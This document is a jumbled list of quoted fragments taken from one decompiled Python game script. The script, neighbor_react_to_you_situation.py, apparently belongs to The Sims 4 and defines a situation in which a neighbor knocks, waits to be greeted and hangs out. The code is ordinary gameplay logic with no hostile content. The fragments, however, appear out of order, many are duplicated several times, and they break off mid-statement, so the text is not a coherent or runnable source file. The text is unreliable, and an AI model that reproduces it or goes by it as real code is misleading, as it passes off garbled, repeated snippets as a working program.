"and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members',",
"return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info,",
"relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState):",
"Situation State for the Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}),",
"', tunable=LootActions.TunableReference(description='\\n A loot action applied to all of the active household Sims",
"DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification =",
"neighbor and the active\\n household Sims if this stiuation state times out.\\n ',",
"self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES =",
"(super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT):",
"loot to apply between the neighbor and the active\\n household Sims if this",
"self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES =",
"'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState,",
"household Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action",
"if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to",
"factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls):",
"[result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else",
"for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the",
"DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables",
"for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold',",
"', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES",
"else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation, exclusivity=(BouncerExclusivityCategory.NORMAL), creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE), duration=0, _implies_greeted_status=False)",
"_on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to",
"the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver',",
"situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import SituationComplexCommon,",
"= services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not",
"active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in",
"result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return",
"def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info,",
"from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption,",
"(AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size",
"apply between the neighbor and the active\\n household Sims if this stiuation state",
"DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct()",
"guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False,",
"bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18)",
"'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState),",
"_on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info)",
"NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on the",
"out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all of the active household",
"door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to",
"relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types",
"for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver)",
"services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker =",
"(BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter),",
"import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from",
"neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM),",
"def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim",
"def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification =",
"(3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900",
"neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id def",
"this situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args,",
"early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon):",
"import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import",
"Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit",
"'_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out for a while.\\n ',",
"the Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State",
"def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._wait_to_be_greeted()) class _NeighborWaitToBeGreetedState(CommonInteractionCompletedSituationState): FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot",
"if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown",
"to apply between the neighbor and the active\\n household Sims if this stiuation",
"(super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim =",
"CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption",
"the active household Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification",
"**kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id,",
"times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied to all of the active",
"file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of source mod",
"situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import",
"household Sims if this\\n situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will",
"return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id",
"in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in",
"_get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info",
"Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14 # Size of source",
"3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC",
"= self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES",
"Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES = ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start',",
"be shown when this situation state times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(),",
"self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock",
"pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim,",
"times\\n out.\\n ')} def __init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot =",
"callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return",
"FACTORY_TUNABLES = {'early_exit_loot':TunableList(description='\\n A list of loot to apply between the neighbor and",
"'_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation':",
"version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7,",
"_NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the",
"_on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in",
"for the Sim to hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n",
"17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py",
"import Situation from situations.situation_complex import SituationComplexCommon, TunableSituationJobAndRoleState, CommonSituationState, SituationStateData, CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list",
"from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex import",
"= DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info) early_exit_notification = self._early_exit_notification((services.active_sim_info()), resolver=resolver) early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self):",
"[MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at:",
"SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls):",
"all of the active household Sims if this\\n situation state times out.\\n ')),",
"out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this situation state times\\n",
"early_exit_notification.show_dialog() self.owner._self_destruct() class _NeighborHangoutState(CommonSituationState): def timer_expired(self): self.owner._self_destruct() class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation",
"2018-07-22 23:17:14 # Size of source mod 2**32: 9737 bytes import random from",
"None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return",
"job_type): super()._on_set_sim_job(sim, job_type) self._neighbor_sim = sim @classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id",
"for the Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation",
"self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household():",
"in neighbors if result.sim_info.is_at_home] neighbor_sim_id = random.choice(neighbor_sim_infos_at_home).sim_id if neighbor_sim_infos_at_home else None return neighbor_sim_id",
"early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in",
"Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)),",
"action applied to all of the active household Sims if this\\n situation state",
"greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang out",
"event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances",
"default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self,",
"to all of the active household Sims if this\\n situation state times out.\\n",
"state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this situation",
"_KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job,",
"from relationships.global_relationship_tuning import RelationshipGlobalTuning from sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from",
"= cls._get_neighbor() if neighbor_sim_id is None: return guest_list = SituationGuestList(invite_only=True, host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id,",
"applied to all of the active household Sims if this\\n situation state times",
"18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled",
"TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs)",
"= ('_buff', 'targeted_situation', '_resident_job', '_relationship_between_job_members', 'audio_sting_on_start', 'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES",
"Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3,",
"SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args,",
"expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None,",
"situation state times out.\\n ')), 'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this",
"to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the",
"locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for the neighbor.\\n ')} REMOVE_INSTANCE_TUNABLES =",
"the Sim to wait to be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state",
"sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState):",
"@classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4,",
"relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state())",
"import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions from relationships.global_relationship_tuning import",
"host_sim_id=neighbor_sim_id, filter_requesting_sim_id=(active_sim_info.sim_id)) guest_list.add_guest_info(SituationGuestInfo(neighbor_sim_id, (cls._starting_neighbor_job_and_role_state.job), (RequestSpawningOption.DONT_CARE), (BouncerRequestPriority.BACKGROUND_MEDIUM), expectation_preference=True)) return guest_list @classmethod def _get_neighbor(cls): active_sim_info",
"sims4.tuning.instances import lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority",
"class NeighborReactToYouSituation(SituationComplexCommon): INSTANCE_TUNABLES = {'_knock_on_door_state':_KnockOnDoorState.TunableFactory(description='\\n Situation State for the Sim to knock on",
"self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action",
"(SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def",
"def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod def default_job(cls): pass def __init__(self, *args, **kwargs):",
"services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors: return neighbor_sim_infos_at_home = [result.sim_info for result in neighbors",
"sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker = sim.sim_info.relationship_tracker for sim_info in services.active_household():",
"TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation import Situation from situations.situation_complex",
"@classmethod def _get_neighbor(cls): active_sim_info = services.active_sim_info() neighbors = services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id",
"2**32: 9737 bytes import random from event_testing.resolver import DoubleSimResolver from interactions.utils.loot import LootActions",
"(tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file",
"SituationStateData(3, _NeighborWaitToBeGreetedState, factory=(cls._wait_to_be_greeted)), SituationStateData(4, _NeighborHangoutState, factory=(cls._hangout_state))) @classmethod def _get_tuned_job_and_default_role_state_tuples(cls): return [(cls._starting_neighbor_job_and_role_state.job, cls._starting_neighbor_job_and_role_state.role_state)] @classmethod",
"for sim_info in services.active_household(): if relationship_tracker.has_bit(sim_info.sim_id, RelationshipGlobalTuning.NEIGHBOR_GIVEN_KEY_RELATIONSHIP_BIT): self._change_state(self.owner._hangout_state()) return self._change_state(self.owner._knock_on_door_state()) class _KnockOnDoorState(CommonInteractionCompletedSituationState): def",
"the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}), '_wait_to_be_greeted':_NeighborWaitToBeGreetedState.TunableFactory(description='\\n Situation State for the Sim to wait",
"def default_job(cls): pass def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def",
"Sim to hang out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and",
"@classmethod def get_predefined_guest_list(cls): active_sim_info = services.active_sim_info() neighbor_sim_id = cls._get_neighbor() if neighbor_sim_id is None:",
"out for a while.\\n ', locked_args={'allow_join_situation': True}), '_starting_neighbor_job_and_role_state':TunableSituationJobAndRoleState(description='\\n Job and Role State for",
"resolver = DoubleSimResolver(sim_info, self.owner._neighbor_sim.sim_info) for loot_action in self._early_exit_loot: loot_action.apply_to_resolver(resolver) resolver = DoubleSimResolver(services.active_sim_info(), self.owner._neighbor_sim.sim_info)",
"'force_invite_only', 'screen_slam_gold', 'screen_slam_silver', 'screen_slam_bronze', 'screen_slam_no_medal') + Situation.SITUATION_START_FROM_UI_REMOVE_INSTANCE_TUNABLES + Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return",
"Situation State for the Sim to knock on the door.\\n ', locked_args={'time_out':None, 'allow_join_situation':True}),",
"def __init__(self, *args, **kwargs): (super().__init__)(*args, **kwargs) self._neighbor_sim = None def _on_set_sim_job(self, sim, job_type):",
"if neighbor_sim_infos_at_home else None return neighbor_sim_id def start_situation(self): super().start_situation() self._change_state(_StartSituationState()) lock_instance_tunables(NeighborReactToYouSituation, exclusivity=(BouncerExclusivityCategory.NORMAL), creation_ui_option=(SituationCreationUIOption.NOT_AVAILABLE),",
"early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for sim_info in services.active_household(): resolver =",
"64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\apartments\\situations\\neighbor_react_to_you_situation.py # Compiled at: 2018-07-22 23:17:14",
"services.sim_filter_service().submit_filter((cls._starting_neighbor_job_and_role_state.job.filter), callback=None, requesting_sim_info=active_sim_info, allow_yielding=False, blacklist_sim_ids={sim_info.sim_id for sim_info in services.active_household()}, gsi_source_fn=(cls.get_sim_filter_gsi_name)) if not neighbors:",
"'early_exit_notification':TunableUiDialogNotificationSnippet(description='\\n Notification that will be shown when this situation state times\\n out.\\n ')}",
"situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification import TunableUiDialogNotificationSnippet import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self,",
"CommonInteractionCompletedSituationState, SituationState from situations.situation_guest_list import SituationGuestInfo, SituationGuestList from situations.situation_types import SituationCreationUIOption from ui.ui_dialog_notification",
"import services class _StartSituationState(SituationState): def _on_set_sim_role_state(self, sim, *args, **kwargs): (super()._on_set_sim_role_state)(sim, *args, **kwargs) relationship_tracker",
"be greeted.\\n ', locked_args={'allow_join_situation': True}), '_hangout_state':_NeighborHangoutState.TunableFactory(description='\\n Situation state for the Sim to hang",
"from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]",
"__init__(self, *args, early_exit_loot=tuple(), early_exit_notification=None, **kwargs): (super().__init__)(*args, **kwargs) self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification",
"self._early_exit_loot = early_exit_loot self._early_exit_notification = early_exit_notification def _on_interaction_of_interest_complete(self, **kwargs): self._change_state(self.owner._hangout_state()) def timer_expired(self): for",
"+ Situation.SITUATION_USER_FACING_REMOVE_INSTANCE_TUNABLES @classmethod def _states(cls): return (SituationStateData(1, _StartSituationState), SituationStateData(2, _KnockOnDoorState, factory=(cls._knock_on_door_state)), SituationStateData(3, _NeighborWaitToBeGreetedState,",
"lock_instance_tunables from sims4.tuning.tunable import TunableList from situations.bouncer.bouncer_types import BouncerExclusivityCategory, RequestSpawningOption, BouncerRequestPriority from situations.situation",
"Sims if this stiuation state times out.\\n ', tunable=LootActions.TunableReference(description='\\n A loot action applied",
